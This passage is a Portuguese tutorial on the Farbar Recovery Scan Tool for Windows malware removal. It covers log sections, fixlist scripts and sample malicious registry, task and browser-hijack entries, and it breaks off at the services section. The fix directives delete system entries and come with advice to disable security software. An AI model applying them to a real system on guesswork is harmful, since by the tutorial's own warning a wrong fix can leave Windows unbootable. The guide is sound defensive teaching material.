Tutorial FRST -Como utilizar a ferramenta "Farbar Recovery Scan Tool"

[Lusitano]

Farbar Recovery Scan Tool

 

A última versão pode ser descarregada em:

Link 1  |  Link 2

 

 

Farbar Recovery Scan Tool (FRST) é uma ferramenta de diagnóstico que incorpora a possibilidade de executar correções mediante scripts previamente elaborados em máquinas infetadas com malware. Funciona tanto em Modo Normal como em Modo Seguro e também em computadores que apresentem problemas no arranque (boot), irá funcionar perfeitamente no Modo de Recuperação do Windows (Windows Recovery Environment). Esta capacidade de funcionar em Modo de Recuperação torna a ferramenta muito útil para lidar com os problemas associados, em computadores com dificuldade em iniciar.
 

**********************************************************

 

Informação sobre o Tutorial

 

Este tutorial foi criado originalmente por emeraldnzl em consulta e sob supervisão de farbar e com a cortesia de colaboração de BC Bleeping Computer e G2G (Geeks to Go). emeraldnzl retirou-se e não poderá dar seguimento as atualizações, sendo agora este tutorial mantido por picasso sob consulta e supervisão de farbar. Permissões e autorizações para a utilização deste tutorial em outros sites, requerem prévia autorização tanto de picasso como de farbar antes de utilizar ou publicar o tutorial em outros meios. Deve ter em conta que este tutorial foi criado originalmente para dar orientação aos assistentes treinados em remoção de malware nos fóruns reconhecidos na comunidade anti-malware.

 

 

Traduções

Alemão (Holanda) | Alemão (Bélgica)
Francês
Alemão
Polaco
Russo
Espanhol
Português (Brasil)

 

Índice

1. Introdução
2. Áreas de Análise padrão
3. Análise Principal (FRST.txt)

• Processos
• Registro
• Tarefas agendadas
• Internet
• Serviços/Drivers [Controladores]
• NetSvcs
• Um mês (Criado/Modificado)
• FLock
• FCheck
• KnownDLLs
• SigCheck
• Associação
• Pontos de Restauração [Pontos de Restauro]
• Informação da memória
• Unidades/Discos [Drives] e MBR & Tabela de Partição
• LastRegBack

4. Análise Adicional

• Contas
• Centro de Segurança
• Programas Instalados
• CLSID personalizado
• Codecs
• Acessos diretos & WMI
• Módulos carregados
• Alternate Data Streams [Sequências de Dados Alternativos]
• Modo Seguro [Modo de Segurança]
• Associação
• Internet Explorer
• Conteúdo Hosts
• Outras Áreas
• MSCONFIG/TASK MANAGER itens desativados
• Regras de Firewall
• Pontos de Restauração [Pontos de Restauro]
• Dispositivos com falha no Gerenciador de Dispositivos
• Erros no Registro de Eventos
• Informação sobre a Memória
• Unidades/Discos [Drives]
• MBR & Tabela de Partição

5. Outras análises opcionais

• Lista BCD
• SigCheckExt
• Shortcut.txt
• Arquivos com 90 dias
• Pesquisar Arquivos
• Pesquisar Registro

6. Diretivas/Comandos

• CloseProcesses:
• CMD:
• Comment:
• Copy:
• CreateDummy:
• CreateRestorePoint:
• DeleteJunctionsInDirectory:
• DeleteKey: e DeleteValue:
• DeleteQuarantine:
• DisableService:
• EmptyEventLogs:
• EmptyTemp:
• ExportKey: e ExportValue:
• File:
• FilesInDirectory: e Folder:
• FindFolder:
• Hosts:
• ListPermissions:
• Move:
• Powershell:
• Reboot:
• Reg:
• RemoveDirectory:
• RemoveProxy:
• Replace:
• RestoreFromBackup:
• RestoreMbr:
• RestoreQuarantine:
• SaveMbr:
• SetDefaultFilePermissions:
• StartBatch: — EndBatch:
• StartPowershell: — EndPowershell:
• StartRegedit: — EndRegedit:
• Symlink:
• SystemRestore:
• TasksDetails:
• testsigning on:
• Unlock:
• VirusTotal:
• Zip:

7. Respostas pré-elaboradas
 

Assistentes e Especialistas acreditados que têm acesso, podem estar atualizados com os últimos desenvolvimentos da ferramenta na:  FRST Lista de discussão

 

 

[Lusitano]

Introdução

Uma das características em que o FRST se destaca é na sua simplicidade. É uma ferramenta desenhada para ser de fácil utilização. As linhas que contêm referências a itens infetados podem ser identificadas, ser copiadas desde o resultado (log), coladas no Bloco de Notas (Notepad) e salvas em arquivo (.txt). Assim, com um simples pressionar do botão, a ferramenta fará o resto. Isto permite uma grande flexibilidade, já que a medida que aparecem novas infeções, elas podem ser identificadas e incluídas na solução (fix).


Em que Sistemas Operativos funcionará

A ferramenta de análise e recuperação Farbar’s (FRST) foi desenvolvida para ser executada nos Sistemas Operativos: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10 e Windows 11. Está disponível em duas versões: 32-bits e 64-bits.

Nota: FRST64 não está desenvolvida para ser executada no sistema Windows XP de 64 bits.


Diagnóstico

FRST cria um arquivo (log) que cobre áreas específicas do Sistema Operativo Windows. Isto pode ser usado para análise inicial dos problemas e para dar informação acerca do sistema.

A ferramenta está em constante desenvolvimento, parte da qual inclui adição de novas etiquetas de identificação de malware. Em consequência, é fortemente recomendado atualizá-la regularmente. Se o computador estiver ligado a internet, quando o FRST for aberto, será automaticamente verificado se existe uma atualização. Irá aparecer uma notificação sobre a última versão disponível e poderá então ser feito o download.

Quando uma nova infeção apareça ou a atualização da ferramenta não seja possível, por exemplo, sem ligação á internet, o assistente/especialista deverá estar atualizado para as novas ameaças de malware, para poder desde logo identificar o problema. O usuário comum deve procurar ajuda dos especialistas quando apareçam novas infeções ou quando encontrem dificuldades em identificar o problema no seu computador.

Por padrão, tal como em outras ferramentas de diagnóstico, FRST aplica uma proteção de segurança (whitelist). Isto evita resultados (logs) muito extensos. Se quiser visualizar o resultado completo; então deverá desativar a respetiva caixa (whitelist) e neste caso, prepare-se para um resultado bastante longo que deverá ser enviado por upload (anexo) para análise.

• Entradas Microsoft padrão estão incluídas na whitelist.
• No caso dos Serviços e Drivers [controladores], a whitelist cobre para além dos padrão da Microsoft, também os outros legítimos.
• Os executáveis assinados da Microsoft estão incluídos na whitelistde "Um mês (criado)"
• Entradas com arquivos não assinados não estão incluídos na whitelist.
• Nenhum programa de segurança (antivírus ou Firewall) estão na whitelist.
• O serviço SPTD não está na whitelist.

 

Preparação para uso

Assegure-se que o FRST é executado com privilégios de administrador. Apenas quando a ferramenta é executada com privilégios de administrador é que poderá funcionar corretamente. Se um utilizador não tiver privilégios de administrador, um alerta será mostrado no cabeçalho do FRST.txt

Em alguns casos um programa de segurança poderá evitar que a ferramenta seja executada plenamente. Geralmente isto não ocorre, mas tenha em atenção que quando se solicita uma análise, um programa de segurança poderá evitar que a ferramenta seja executada. Quando for para serem aplicadas correções aos problemas encontrados, é preferível temporariamente desativar os programas de segurança que possam impedir a ferramenta de fazer o seu trabalho, tal como por exemplo o Comodo.

Uma recomendação geral para todos, é que quando se esteja a lidar com um rootkik, é preferível corrigir no momento e esperar pelo resultado obtido, antes de executar outra ferramenta.

Não é necessário criar uma cópia do Registro. FRST faz uma cópia das chaves do Registro desde a primeira vez que é executada. A cópia (backup) estará localizada em %SystemDrive%\FRST\Hives (geralmente em C.\FRST\Hives). Consulte o guia RestoreFromBackup: para informação mais detalhada.

FRST está disponível em vários idiomas diferentes. Os assistentes que ajudam nos fóruns os usuários menos experientes, por norma utilizam língua inglesa na ajuda e análises dos problemas. Se alguém deseja providenciar os logs em inglês, bastará adicionar a palavra English ao nome do executável, por exemplo, EnglishFRST.exe ou EnglishFRST64.exe ou FRSTEnglish.exe ou FRSTEnglish64.exe. Desta forma os resultados (logs) estarão no idioma inglês.


Executar o FRST

O utilizador deverá descarregar o FRST para o seu Ambiente de Trabalho (Desktop). A partir daí, bastará um duplo clique no ícone do FRST, aceitar a exclusão de toda a responsabilidade (disclaimer) e a ferramenta será executada. O ícone do FRST têm a seguinte aparência:

                                                                                                                                           

Nota: Deverá ser usada a versão compatível com o sistema operativo. Existe a versão de 32-bits e de 64-bits. Se não tiver a certeza de qual a versão a aplicar, poderá fazer a descarga (download) de ambas as versões e tentar executá-las. Apenas uma delas funcionará e irá será executada no sistema e essa será a versão adequada.

Ao executar o FRST, irá aparecer uma janela com a consola do programa, semelhante a esta:

                                                                       

Quando o FRST terminar o processo de análise (scan), guardará as cópias em arquivos de Bloco de Notas (.txt) na mesma localização de onde foi executado. Na primeira e subsequentes análises realizadas fora do Ambiente de Recuperação, a ferramenta irá criar dois arquivos (logs): FRST.txt e Addition.txt.

As cópias destes arquivos são guardadas em %SystemDrive%\FRST\Logs (na maioria dos casos será em C:\FRST\logs).


Correção de Problemas

Atenção, Muito Importante: A ferramenta Farbar Recovery Scan não é invasiva no seu modo de análise (scan) e portanto não pode causar nenhum dano ao computador.

Contudo, FRST também é muito efetiva na execução de instruções que lhe sejam dadas. Ao aplicar uma solução (fix); se foram dadas instruções para remover um elemento; em 99% dos casos isso irá acontecer. Embora a ferramenta tenha algumas medidas de segurança incorporadas, elas são generalizadas e destinadas a não interferirem com o processo de remoção da infeção. O usuário deve estar consciente destes fatos. Se a ferramenta for usada incorretamente (isto é, se forem dadas instruções para remover arquivos essenciais), a ferramenta pode fazer com que o computador não inicie o Sistema Operativo.

 

Se não está completamente seguro sobre algum elemento dos resultados (logs) criados pela ferramenta, procure ajuda e opinião de um especialista antes de criar e aplicar um arquivo de correção (fix).

FRST tem uma ampla gama de comandos e interruptores, que podem ser usados tanto para manipular os processos do computador ou para corrigir os problemas que tenham sido identificados.


Preparando o Arquivo de Correção (Fixlist)

1. Método Fixlist.txt -  Para corrigir os problemas identificados, copie e cole as linhas afetadas desde os arquivos (FRST logs) para um arquivo de texto dando o nome de fixlist.txt e guarde-o na mesma diretoria de onde a ferramenta foi executada.

Nota: É importante que seja utilizado o Bloco de Notas (Notepad). A solução (fix) não funcionará se utilizar o Word ou outro qualquer processador de texto.

2. Método Ctrl + Y -  Este atalho de teclado pode ser usado para criar e automaticamente abrir um novo arquivo para ser preenchido. Execute o FRST, pressione Ctrl+y para abrir o arquivo, cole o fix, pressione Ctrl+s para salvar.

3. Método Clipboard -  Insira as linhas a corrigir entre os comandos Start:: e End::, conforme exemplificado abaixo:

Start::
conteúdo do script
End::

 

Se está auxiliando um usuário, certifique-se que todo o conteúdo é copiado, incluindo os comandos Start:: e End:: e que é pressionado o botão Corrigir.

 
Unicode 

Para corrigir uma entrada que contenha caracteres Unicode, o arquivo script com a solução deve ser guardado em Unicode, caso contrário os caracteres Unicode serão perdidos. O atalho Ctrl + Y guarda o arquivo de texto em Unicode. Mas no caso de ter sido criado manualmente o fixlist.txt, deverá se escolher uma codificação adequada no Bloco de Notas (Notepad), conforme abaixo.

 

Exemplo:

Citação

S2 楗敳潂瑯獁楳瑳湡t; 㩃停潲牧浡䘠汩獥⠠㡸⤶坜獩履楗敳䌠牡⁥㘳尵潂瑯楔敭攮數 [X]
ShortcutWithArgument: C:\Users\Public\Desktop\Gооglе Сhrоmе.lnk -> C:\Users\User\AppData\Roaming\HPRewriter2\RewRun3.exe (QIIXU APZEDEEMFA) -> 1 0 <===== Cirílico
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Ｇooｇle Ｃhroｍe.lnk.bat

 

Copie e cole as entradas para o Bloco de Notas, escolha Guardar como..., na opção Codificação: selecione UTF-8, atribua o nome fixlist e guarde-o.

Se guardar o arquivo sem selecionar UTF-8, o Bloco de Notas irá dar um aviso. Se ignorar essa advertência e salvar o arquivo, após guardar e voltar a abrir, irá obter algo parecido com isto:

Citação

S2 ????????t; ??????????????????????????? [X]
C:\Users\Public\Desktop\G??gl? ?hr?m?.lnk
2016-08-17 14:47 - 2016-08-17 16:23 - 00000000 _____ C:\ProgramData\Google Chrome.lnk.bat

E o FRST não irá conseguir processar as entradas.


Nomes de usuários manipulados

Alguns usuários alteram os logs, removendo ou modificando o nome de usuário. Para haver a certeza que os caminhos corretos são processados, pode-se mudar o nome de usuário potencialmente modificado com CurrentUserName (para o usuário com a sessão iniciada) ou AllUserName (para todos os usuários do sistema). FRST irá automaticamente interpretar e converter para o correto nome do usuário existente.

Nota: CurrentUserName não é suportado no Modo de Recuperação.
 

Para prevenir que FRST fique executando por várias horas devido a scripts incorretos, o tempo total para execução das diretivas cmd: e Powershell: está limitado a 60 minutos.

Itens movidos pela correção (fix) são mantidos em %SystemDrive%\FRST\Quarantine, geralmente em C:\FRST\Quarantine até a limpeza final e remoção do FRST.

Para informação mais detalhada sobre como preparar as correções (fix), consulte as seções abaixo.


Desinstalar FRST

Para eliminar automaticamente todos os arquivos/pastas criadas pelo FRST e a própria ferramenta, renomeie FRST/FRST64.exe para uninstall.exe e execute. Este procedimento requer o reinicio do sistema e apenas funciona fora do Modo de Recuperação.

 

 

[Lusitano]

Áreas de Análise Padrão

 
Na primeira e subsequentes análises fora do Modo de Recuperação, será gerado um arquivo FRST.txt e outro arquivo Addition.txt. O arquivo Addition.txt não é gerado quando se executa o FRST em Modo de Recuperação.

Execução em modo normal:

Análise principal

 

Processos [verificação de assinatura digital]
Registro [verificação de assinatura digital]
Tarefas Agendadas [verificação de assinatura digital]
Internet [verificação de assinatura digital]
Serviços [verificação de assinatura digital]
Drivers [Controladores] | [verificação de assinatura digital]
NetSvcs
Um mês (Criado) [Microsoft verificação de assinatura digital]
Um mês (Modificado)
Arquivos de algumas diretorias
FLock
FCheck
SigCheck [verificação de assinatura digital]
LastRegBack
 

Análise adicional

 

Contas
Centro de Segurança
Programas instalados
CLSID personalizado [verificação de assinatura digital]
Codecs [verificação de assinatura digital]
Atalhos & WMI
Módulos Carregados [verificação de assinatura digital]
Alternate Data Streams [Sequências de Dados Alternativos]
Modo Seguro [Modo de Segurança]
Associação
Internet Explorer [verificação de assinatura digital]
Conteúdo Hosts
Outras Áreas
MSCONFIG/TASK MANAGER itens desativados
Regras de Firewall [verificação de assinatura digital]
Pontos de Restauração [Pontos de Restauro]
Dispositivos com defeito no Gerenciador de Dispositivos [Gestor de Dispositivos]
Erros de Registro de enventos
Informação da Memória
Unidades/Discos [Drives]
MBR & Tabela de Partição


Análise Opcional

Lista BCD
SigCheckExt [verificação de assinatura digital]
Shortcut.txt
Addition.txt
Arquivos 90 dias

Procurar Arquivos [verificação de assinatura digital]
Procurar no Registro

Nota: [Arquivo não assinado] será indicado para arquivos sem assinatura digital ou arquivos com assinatura não verificada.


Execução das Análises em Modo de Recuperação

Análise Principal

Registro
Tarefas Agendadas
Serviços
Drivers  [Controladores]
NetSvcs
Um mês (Criado)
Um mês (Modificado)
KnownDLLs
SigCheck
Associação
Pontos de Restauração [Pontos de Restauro]
Informação da Memória
Unidades/Discos [Drives]
MBR & Tabela de Partição
LastRegBack
 

Análises Opcionais

Lista BCD
Arquivos 90 dias

Procurar Arquivos

Nota: A verificação das assinaturas digitais não está disponível no Modo de Recuperação.

 

 

[Lusitano]

Análise Principal (FRST.txt)

Cabeçalho

Exemplo de cabeçalho:

A leitura do cabeçalho pode ser muito útil:

 

Resultado da análise de Farbar Recovery Scan Tool (FRST) (x64) Versão: 03-08-2021

Executado por Lusit (administrador) em em pc_antigo (LENOVO 80G0) (29-10-2021 11:16:17)

Executando a partir de C:\Users\Lusit\Desktop

Perfis Carregados: Lusit

Platforma: Windows 10 Pro Versão 21H1 19043.1110 (X64)

Idioma: Português (Brasil)

Navegador padrão: Edge Modo da Inicialização: Normal

Primeira linha: indica se foi executado FRST 32-bit ou 64-bit. Também mostra a versão do FRST. A identificação da versão executada é particularmente importante. Uma versão não atualizada pode ter funcionalidades menos avançadas.

Segunda linha: mostra que usuário executou a ferramenta e sob que permissões. Esta linha pode alertar se o usuário tem as apropriadas permissões. Esta linha também mostra o nome do computador junto com o Fabricante e Modelo do Sistema (se disponível). A data e hora em que a ferramenta foi usada é útil para identificar se um log antigo foi inadvertidamente enviado por um usuário.

Terceira linha: informa em que conta de usuário a ferramenta foi executada. Isto pode ser útil para as correções, se foi executada sem ter sido do Ambiente de Trabalho (Desktop).

Quarta linha: indica em que conta (perfil) a sessão foi iniciada, isto é, as chaves de usuário carregadas (ntuser.dat e UsrClass.dat).

 

Quinta linha: indica edição do Windows na máquina, incluindo atualizações importantes (versão e compilação do sistema operacional no Windows 11 e Windows 10, "Atualização" no Windows 8.1, Service Pack no Windows 7 e versões anteriores), juntamente com o idioma usado. Isso pode alertá-lo sobre um problema com atualizações se elas não forem as mais recentes.

Nota: No caso de haver mais do que uma conta carregada (utilizando as opções do sistema "mudar de usuário" ou " encerrar sessão" para mudar de conta) FRST irá listar todas as contas em "Perfis Carregados" e as suas entradas de Registro. Outras contas não carregadas, não serão mostradas em "Perfis Carregados" mas FRST irá automaticamente montar as chaves coincidentes (apenas ntuser.dat) para análise do Registro.

Quinta linha: Regista a versão do Windows instalada no computador, incluindo as atualizações mais importantes Versão e OS no Windows 11 e Windows 10, "Update" no Windows 8.1, Service Pack no Windows 7 e anteriores) junto com o idioma utilizado. Isto pode alertar sobre problemas com as atualizações ou se o sistema não está devidamente atualizado.

Sexta linha: Indica o navegador predeterminado.

Sétima linha: informa em que foi executada a análise.

Nota: A informação mostrada no cabeçalho quando a ferramenta é executada no Modo de Recuperação é semelhante, porém está forçosamente truncada já que os os perfis de usuário não foram carregados.

 

Alertas que podem ser mostrados no cabeçalho

Quando há problemas no arranque (boot) poderá ver algo semelhante a "ATENÇÃO: Não pode ser carregada a chave do sistema". Isto informa que a chave do sistema está em falta. Restaurar a chave utilizando LastRegBack: poderá ser a solução (ver abaixo).

"Padrão: Controlset001" - A notificação informa qual o CS (ControlSet) do sistema está predeterminado no CS. Por que esta informação é necessária? Normalmente, não é necessária, mas no caso de se querer examinar ou manipular o CS que se carregará quando o Windows for iniciado (booted), então já se saberá qual o CS que se deverá examinar ou manipular. Fazer qualquer outra coisa a outro CS disponível, não terá qualquer efeito no sistema.
 

Processos
 

 

(cmd.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(Mozilla Corporation -> Mozilla Corporation) C:\Program Files\Mozilla Firefox\firefox.exe <8>

Caso um processo seja executado por outro processo, (processo parental ->) será listado.

 

<número> em anexo no final da linha indica as diversas instâncias do mesmo processo.

Há duas razões para as quais se pode querer parar um processo. Primeiro, poderá querer parar um processo legitimo que possa interferir com a solução (fix). Segundo, poderá querer parar um processo malicioso e consequentemente remover a pasta e arquivo associado a ele.

Para parar um processo, inclua as linhas correspondentes que são informadas no relatório do FRST.
 

Um arquivo Fixlog.txt será gerado com esta etiqueta tendo no seu interior o nome do Processo => Processo fechado com sucesso.

Se no relatório aparece um processo malicioso e deseja remover o arquivo e pasta associada, terá de incluir cada item separado no seu fix.

 

Registro

Entradas de Registro (chaves ou valores) que sejam apanhadas desde o relatório (log) do FRST e incluídas no fixlist serão eliminadas. FRST possuí uma poderosa rotina de eliminação para as chaves e valores. Todas as chaves e valores que resistam a eliminação devido a permissão insuficiente ou caracteres nulos embutidos serão eliminados. As chaves que resistam a eliminação por causa de acesso negado serão agendadas e posteriormente eliminadas no reinicio (reboot) do sistema. AS únicas chaves que não serão eliminadas, são as chaves protegidas por um controlador kernel (Kernel driver). Essas chaves/valores deverão ser eliminadas após ser desativado ou eliminado o controlador kernel que as protege.

Copiar e colar os itens desde o resultado (log) dentro do fix, despoleta o FRST a realizar um de duas ações na chave/valor do Registro listado:

1. Restaurar a chave/valor predeterminada ou
2. Eliminar a chave/valor.

Quando as entradas do log estão relacionadas com BootExecute, Winlogon valores (Userinit, Shell, System), LSA, e AppInit_DLLs e são copiadas para o fixlist, a ferramenta restaura para os valores predeterminados do Windows.

Nota: Com AppInit_DLLs quando há um caminho malicioso, FRST elimina este caminho particular do valor de AppInit_DLLs sem eliminar os restantes valores.

Não há necessidade de fazer nenhum batch ou regfix. O mesmo se aplica a outras chaves/valores importantes que possam ter sido alvo do malware.

Nota: FRST não toca nos arquivos que as chaves do Registro estão sendo carregadas ou executadas. Os arquivos a serem movidos devem ser listados em separado com o caminho completo sem nenhuma informação adicional.

O Run, RunOnce, Image File Execution Options e outras entradas de Registro se forem copiadas para o fixlist serão removidas do Registro. Os arquivos que estão a ser carregados ou executados não serão removidos. Se deseja remove-los, então deverão ser listados separadamente.

Por exemplo, para remover uma entrada maliciosa juntamente com o arquivo, deverá ser incluído no fixlist da seguinte maneira (a primeira linha copiada diretamente do log:

HKLM\...\RunOnce: [LT1] => C:\WINDOWS\TEMP\gA652.tmp.exe [216064 2019-04-13] () [Arquivo não assinado] <==== ATENÇÃO 
C:\WINDOWS\TEMP\gA652.tmp.exe

Quando um arquivo ou atalho na pasta Startup (Iniciar) é detetado, FRST informa o arquivo nas entradas Startup:. Se o arquivo é um atalho a linha seguinte irá mostrar o destino deste atalho (isto é, o executável ao qual o atalho se refere). Para eliminar tanto o atalho como o arquivo correspondente, deverá incluir ambos no fixlist.

Exemplo:

Startup: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.lnk [2019-03-25] 
ShortcutTarget: helper.lnk -> C:\Users\User\AppData\Roaming\WindowsServices\helper.vbs () [Arquivo não assinado]

 

Nota: A primeira linha apenas move o atalho. A segunda linha move o arquivo helper.vbs. Se apenas colocar a segunda linha, o arquivo executável será eliminado mas o atalho continuará na pasta Startup. A próxima vez que o sistema seja iniciado será ocorrer um erro quando o atalho tente encontrar o arquivo executável e não o irá conseguir encontrar.

 

FRST deteta e redireciona as pastas Startup (per.user e per-system).

 

Exemplo:

StartupDir: C:\Users\User\AppData\Local\Temp\b64c58644b\  <==== ATENÇÃO

Para corrigir, bastará incluir esta entrada no fixlist e a ferramenta FRST irá restaurar para o valor padrão.

 

No caso de malwares que abusam de certificados que não sejam de confiança ou de Políticas de Restrição do Sistema, encontrará entradas como estas:

HKLM\ DisallowedCertificates: AD4C5429E10F4FF6C01840C20ABA344D7401209F (Avast Antivirus/Software) <==== ATENÇÃO

HKLM Group Policy restriction on software: C:\Program Files\AVAST Software <====== ATENÇÃO

Para desbloquear programas de segurança, inclua as linhas no fixlist.

Nota: A deteção de Políticas de Restrição de Software é genérica e pode resultar em notificações de outras entradas legítimas criadas para proteger o sistema. Veja: Como criar manualmente Políticas de Restrição de Software para bloquear ataques de Ransomware.

FRST também deteta a presença de objectos em Group Policy (Registry.pol e Scripts) que podem ser utilizados por malware. Firefox, Google Chrome, Edge e as políticas do Windows Defender definidas no arquivo Registry.pol são apresentadas em separado:

GroupPolicy: Restriction - Windows Defender <======= ATENÇÃO

 

Para outras políticas ou scripts, apenas será verá uma notificação genérica sem detalhes:

GroupPolicy: Restriction ? <======= ATENÇÃO
GroupPolicyScripts: Restriction <======= ATENÇÃO

Para restabelecer as políticas para o seu estado original, inclua essas linhas no fixlist. FRST irá eliminar as pastas GroupPolicy e forçará um reinicio (reboot).

Exemplo:

C:\Windows\system32\GroupPolicy\Machine => foi movido com sucesso 
C:\Windows\system32\GroupPolicy\GPT.ini => foi movido com sucesso

Nota: A deteção está ajustada para um computador pessoal sem políticas configuradas e pode provocar sinalizar entradas legítimas introduzidas manualmente via gpedit.msc.
 

Tarefas Agendadas

Quando uma entrada é incluída no fixlist, a própria tarefa será corrigida.

Exemplo:

Task: {A0DC62F9-8007-4B9C-AAA2-0AB779246E27} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [4925952 2019-03-19] () [Arquivo não assinado] <==== ATENÇÃO

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removido (a) com sucesso 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A0DC62F9-8007-4B9C-AAA2-0AB779246E27}" => removido (a) com sucesso 
C:\Windows\System32\Tasks\csrss => foi movido com sucesso 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\csrss" => removido (a) com sucesso

Tenha em conta que FRST apenas elimina as entradas de Registro e move o arquivo de tarefa, mas não elimina o arquivo executável da mesma. Se o arquivo executável é malicioso deverá ser adicionado em uma linha separada no fixlist para ser movido.

Nota: Um malware pode fazer uso de um executável legítimo (por exemplo, usar sc.exe para executar os seus próprios serviços) para se executar. Por outras palavras, você verificar o executável para verificar se é legítimo ou não, antes de agir.

A seguinte linha não deverá ser incluída no fixlist:

"{Aleatório GUID}" => a chave foi desbloqueada. <==== ATENÇÃO

Esta mensagem indica que FRST detetou uma permissões quebradas e automaticamente reparou durante o processo de análise (scan). Deverá ser efetuada uma nova análise (scan) para verificar no resultado se a tarefa desbloqueada (tarefa personalizada) ou não (entrada Microsoft na whitelist). Se for necessário, inclua a linha de tarefa padrão no fixlist.


Internet

Salvo algumas exceções, itens copiados para a fixlist serão eliminados. Para as entradas de Registro que envolvam arquivos/pastas, os arquivos/pastas deverão ser listados separadamente para serem movidos. Isto não se aplica às entradas dos navegadores, veja as descrições abaixo para maiores detalhes:


Winsock

Se for incluída uma entrada Catalog5 na solução (fix), FRST fará uma destas coisas:

1. No caso de entradas padrão sequestradas, irá ser restaurada a entrada predeterminada.
2. No caso de entradas modificadas, irá eliminá-las e voltar a numerar automaticamente as entradas do catálogo.

Quando forem incluídas entradas do Catalog9 para serem reparadas, é recomendável utilizar o comando "netsh winsock reset":

cmd: netsh winsock reset

Quando continue a haver entradas Catalog9 para serem corrigidas, podem ser incluídas no fixlist. Nesse caso, FRST irá eliminar as entradas e voltar a numerar as entradas do catálogo.

Atenção: uma corrente quebrada impedirá o computador de se conetar à Internet.

Um acesso á internet quebrado por falta de elementos winsock, será reportado no log da seguinte maneira:

Winsock: -> Catalog5 - acesso à internet interrompido devido à entrada ausente. <===== ATENÇÃO

Winsock: -> Catalog9 - acesso à internet interrompido devido à entrada ausente. <===== ATENÇÃO

Para corrigir este problema, as entradas deverão ser incluídas no fixlist.


hosts

Quando se encontrem entradas incluídas no arquivo Hosts, irá aparecer uma linha na seção Internet no log FRST.txt, indicando o seguinte:
 

Hosts: Há mais de uma entrada no Hosts. Veja a seção Hosts do Addition.txt

Se o arquivo hosts não for detetado, haverá uma linha informando a impossibilidade de o detetar.

Para restabelecer o arquivo host, bastará copiar e colar a linha no fixlist e o hosts será restabelecido. Verá uma linha no Fixlog.txt a confirmar o restabelecimento.
 

Tcpip e outras entradas

As entradas quando incluídas no fixlist serão eliminadas.

Nota: Os servidores DNS configurados no Registro (DhcpNameServer e NameServer) podem ser comparados com os "DNS servers" listados no arquivo Addition.txt para detetar qual configuração está ativa.

 
Nota: No caso de sequestro dos valores de Registro StartMenuInternet, as entradas padrão (default) estarão na whitelist. Quando aparecem entradas destas no resultado (log), isso quer dizer que um non-default path [caminho não-padrão] é mostrado. Tanto pode ser por haver algo errado, ou não, com o caminho de acesso no registro e deverá ser feita uma investigação mais aprofundada. Onde houver um problema, a entrada pode ser incluída na lista de correção e a entrada de registro padrão será restaurada.

Nota: As extensões não instaladas através de repositórios oficiais (Chrome Web Store, Firefox Add-ons, Microsoft Edge Addons, Opera add-ons) terão uma url de atualização detetada.


Edge

No Windows 10, ambas as versões do navegador são detetadas e listadas juntamente no log.

Edge clássico: Exceto DownloadDir, as linhas podem ser inseridas no fixlist e os itens serão eliminados.

Edge baseado em Chromium: Aplicam-se as mesmas regras que no Google Chrome. Ver descrição abaixo.


Firefox

FRST lista as chaves e perfis de FF (se presentes) independentemente se está ou não instalado. Quando existam vários perfis de Firefox ou vários Firefox, FRST irá listar as preferências e extensões de todos os perfis. Os perfis não standard inseridos por adware serão sinalizados.

Exceto FF DefaultProfile e FF DownloadDir, todas as restantes linhas podem ser incluídas no fixlist e os itens serão eliminados.

FRST verifica a assinatura de extensões. Extensões não assinadas, são etiquetadas.
Exemplo:

FF Extension: (Adblocker for Youtube™) - C:\Program Files\Mozilla Firefox\browser\features\{A5FD4672-4D73-4F90-A1C0-2ABD39DB2565}.xpi [2018-01-18] [não assinado]

Chrome

FRST lista as chaves e perfis (se presentes) independentemente do Chrome estar ou não instalado. Quando existam vários perfis, FRST irá listar as preferências e extensões de todos os perfis. Os perfis não standard inseridos por malware, serão sinalizados.

A análise de preferências incluem as entradas da Página Principal (HomePage) e as direções url de inicio modificadas (StartupUrls), se a Sessão de Restauração está habilitada, alguns parâmetros do provedor de busca predeterminado personalizado e notificações autorizadas:
 

CHR HomePage: Default -> hxxp://www.web-pl.com/
CHR StartupUrls: Default -> "hxxp://www.web-pl.com/"
CHR DefaultSearchURL: Default -> hxxp://www.web-pl.com/search?q={searchTerms}
CHR Session Restore: Default -> está habilitado.
CHR Notifications: Default -> hxxps://www.speedtestace.co

As entradas HomePage, StartupUrls e Notifications serão eliminadas quando incluídas no fixlist. O processamento de outras entradas irá resultar em um restabelecimento (reset) parcial do Chrome e o usuário poderá visualizar a seguinte mensagem na página de configuração do Chrome: "Chrome detetou que alguns ajustes de configuração foram danificados por outro programa e os restabeleceu para os seus valores originais.

FRST também deteta redireções de Novo Separador controladas por extensões. Para eliminar a redireção, identifique a extensão correspondente (se presente) e desinstale-a através das ferramentas do Chrome (ver abaixo).

CHR NewTab: Default ->  Active:"chrome-extension://algadicmefalojnlclaalabdcjnnmclc/stubby.html"
CHR Extension: (RadioRage) - C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Extensions\algadicmefalojnlclaalabdcjnnmclc [2017-04-07]

 

A remoção de extensões não é suportada. As linhas de CHR Extension não são processadas no fix. Em alternativa, deverá usar as próprias ferramentas do Chrome:

 

Digite na barra de endereço chrome://extensions e pressione Enter.
Clique em Eliminar na extensão que você deseja remover completamente.
Irá surgir uma caixa de diálogo com a confirmação, clique em Eliminar.

 

Uma exceção é um instalador de extensão localizado no Registro (Etiquetas CHR HKLM e HKU). Quando a entrada é incluída no fix.

 

Outros navegadores baseados em Chromium

Atualmente, os seguintes navegadores são suportados: Brave, Opera, Vivaldi e Yandex.

Para todos eles se aplicam as mesmas regras que para o Google Chrome. Consulte a descrição anterior.

Para todos os outros navegadores não mostrados no resultado (log), a melhor opção é a completa desinstalação, seguido de reinicio do sistema e reinstalação.

 

Serviços e Drivers [Controladores]

Os Serviços e Drivers [Controladores] são apresentados nos seguintes formatos:

